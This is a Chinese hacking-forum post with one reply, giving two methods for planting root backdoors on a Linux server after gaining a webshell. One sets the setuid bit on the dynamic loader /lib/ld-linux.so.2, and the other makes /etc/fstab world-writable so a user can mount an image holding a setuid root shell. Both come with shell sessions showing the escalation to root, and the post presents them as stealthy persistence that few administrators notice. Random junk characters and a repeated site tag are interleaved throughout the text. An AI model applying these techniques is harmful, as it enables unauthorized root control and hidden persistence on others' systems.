中国网络渗透测试联盟

标题: webshell下LINUX提权+留后门 [打印本页]

作者: admin    时间: 2013-3-8 21:56
标题: webshell下LINUX提权+留后门
方法一:setuid的方法,其实8是很隐蔽。看看过程:2ezX-BUG-关注前沿信息安全技术研究
: q2 `& n3 P2 m5 M7 c& c# v9 G) {) ~6 i$ Q; P0 V' g
[root@localdomain lib]# ls -l |grep ld-linux2ezX-BUG-关注前沿信息安全技术研究* M/ G7 K) R5 C/ J2 e/ b5 p
lrwxrwxrwx 1 root root 9 2008-06-07 17:32 ld-linux.so.2 -> ld-2.7.so2ezX-BUG-关注前沿信息安全技术研究
  k8 ^3 `  e+ q  klrwxrwxrwx 1 root root 13 2008-06-07 17:47 ld-lsb.so.3 -> ld-linux.so.22ezX-BUG-关注前沿信息安全技术研究
: b, a! X* }2 A& J: }; H[root@localdomain lib]# chmod +s ld-linux.so.22ezX-BUG-关注前沿信息安全技术研究
7 |$ s: f9 F0 ]8 Q[root@localdomain lib]# ls -l |grep ld-2.7.so2ezX-BUG-关注前沿信息安全技术研究! W$ O/ o' Y0 h: X3 O
-rwsr-sr-x 1 root root 128952 2007-10-18 04:49 ld-2.7.so2ezX-BUG-关注前沿信息安全技术研究
& `+ V# t+ w) ^, K# `) v+ Plrwxrwxrwx 1 root root 9 2008-06-07 17:32 ld-linux.so.2 -> ld-2.7.so2ezX-BUG-关注前沿信息安全技术研究& W( h3 H9 }! [7 w- E0 C
[root@localdomain lib]#2ezX-BUG-关注前沿信息安全技术研究8 t5 Y: E6 Y- q* U1 ^. |. a
我们这里给/lib/ld-linux.so.2这个文件(在FC8里,它指向ld-2.7.so这个文件)加了setuid属性。然后我们看怎么利用它。2ezX-BUG-关注前沿信息安全技术研究
8 ~- @$ M% W1 L* z3 O; R( h, @4 K) F" x
普通用户登录,测试下权限:2ezX-BUG-关注前沿信息安全技术研究
  m& q; V2 G% r9 Q( m9 S: }! x9 i8 x( o8 y0 R  w' h. ]7 p
[xiaoyu@localdomain ~]$ whoami2ezX-BUG-关注前沿信息安全技术研究0 U+ x- H3 B, X" [
xiaoyu2ezX-BUG-关注前沿信息安全技术研究
/ l3 `5 g' I! u: Y[xiaoyu@localdomain ~]$ /lib/ld-linux.so.2 `which whoami`2ezX-BUG-关注前沿信息安全技术研究5 y, n1 o: U. Q- z
root2ezX-BUG-关注前沿信息安全技术研究
/ I9 S) G" f# a. r[xiaoyu@localdomain ~]$2ezX-BUG-关注前沿信息安全技术研究9 h; x  r: V2 U) x8 r1 d  Z
恩,嘿嘿 root了吧,具体怎么生成root shell,你们自己去想吧,凡事都不要点得太透,对吧。呵呵,可以肯定的一点,/lib/ld-linux.so.2 /bin/sh肯定生成不了rootshell, bash检查euid 和uid,看是否相等...OK,不多说了。2ezX-BUG-关注前沿信息安全技术研究8 i: G* N5 A  o
$ D7 v8 c) @  Y7 `3 Y1 _7 S# U
方法二:2ezX-BUG-关注前沿信息安全技术研究7 [' E) Y9 C* |1 k$ X

. I6 C/ c  f& Q5 ]9 G( z4 k; B看过程:2ezX-BUG-关注前沿信息安全技术研究; w' p5 V# l. h- }( w9 C
* J4 c1 \6 [7 T
[root@localdomain etc]# chmod a+w /etc/fstab2ezX-BUG-关注前沿信息安全技术研究. w: M6 U- g. z2 o
[root@localdomain etc]#2ezX-BUG-关注前沿信息安全技术研究! }  G9 }0 h. v0 i' O/ u3 V  w' ^1 ?, B

% `$ [& o9 o) g. E/ F6 R这就留好了。此方法比较XXOXX,估计没几个管理员知道。利用方法演示下2ezX-BUG-关注前沿信息安全技术研究
# f( P/ ?& ], V( }  R- J) ?0 n+ }2 K: x' h# O
[xiaoyu@localdomain ~]$ ls -l /etc/fstab2ezX-BUG-关注前沿信息安全技术研究9 o$ t" I% C2 \7 J  Y
-rw-rw-rw- 1 root root 456 2008-06-07 17:28 /etc/fstab2ezX-BUG-关注前沿信息安全技术研究6 ]! M9 {) {- |4 @4 W
[xiaoyu@localdomain ~]$ echo 'test /mnt ext2 user,suid,exec,loop 0 0' >> /etc/fstab2ezX-BUG-关注前沿信息安全技术研究
' K6 n( z! z1 Q$ g2 I" p7 e' K3 M7 M7 Z7 W0 j' c5 ~( p
然后从本机把一个文件到目标机器上去,这里我们命名为test2ezX-BUG-关注前沿信息安全技术研究6 y% m0 L7 }& z( {0 m- i$ j# K: j
8 N  d8 Z2 |; D9 e. h
[xiaoyu@localdomain tmp]$ ls -l test2ezX-BUG-关注前沿信息安全技术研究: Y0 R  T, G! P( P5 O0 x
-rw-rw-r-- 1 xiaoyu xiaoyu 102400 2008-04-20 02:51 test2ezX-BUG-关注前沿信息安全技术研究' Q, Z7 r, n1 B8 H8 h- W0 `2 W
[xiaoyu@localdomain tmp]$ mount test2ezX-BUG-关注前沿信息安全技术研究2 ?$ A: y$ ^. m
[xiaoyu@localdomain tmp]$ cd /mnt2ezX-BUG-关注前沿信息安全技术研究: @+ n4 D- S% V: B& U- j% E- O" W
[xiaoyu@localdomain mnt]$ ls -l2ezX-BUG-关注前沿信息安全技术研究
/ O% N7 z4 Y8 X3 U9 Utotal 182ezX-BUG-关注前沿信息安全技术研究: B( D% u; E! p( B6 _6 f
drwx------ 2 root root 12288 2008-04-20 05:44 lost+found2ezX-BUG-关注前沿信息安全技术研究% r0 Y, T$ L! q5 O* D. a
-rwsr-sr-x 1 root root 4927 2008-04-20 05:44 root2ezX-BUG-关注前沿信息安全技术研究
+ ~  O! ~5 d. a[xiaoyu@localdomain mnt]$ ./root2ezX-BUG-关注前沿信息安全技术研究: v0 }2 [* W7 H8 N
sh-3.2#2ezX-BUG-关注前沿信息安全技术研究6 ?0 ]1 z* ]4 t* p' N5 a# \4 r
看到了吧,从普通用户提升到root了。呵呵。2ezX-BUG-关注前沿信息安全技术研究( }& ~8 n0 f. D! m9 R8 a
test这个文件baidu貌似木有上传功能撒,木办法传2ezX-BUG-关注前沿信息安全技术研究0 G7 ~+ \; o3 |; `& I+ [
( L* f9 Y* y. J: T# G2 R' O1 y
貌似可能有人说本地后门木啥鸟用,但是你要搞清楚:一个webshell里面就可以完成这一切....2ezX-BUG-关注前沿信息安全技术研究
5 S# s* E; G1 [: [8 J4 X2ezX-BUG-关注前沿信息安全技术研究
1 B) Q$ i' E( l% ~4 \2 P% f0 i7 f- Z

作者: wuyu    时间: 2013-3-13 15:10
谢谢分享




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2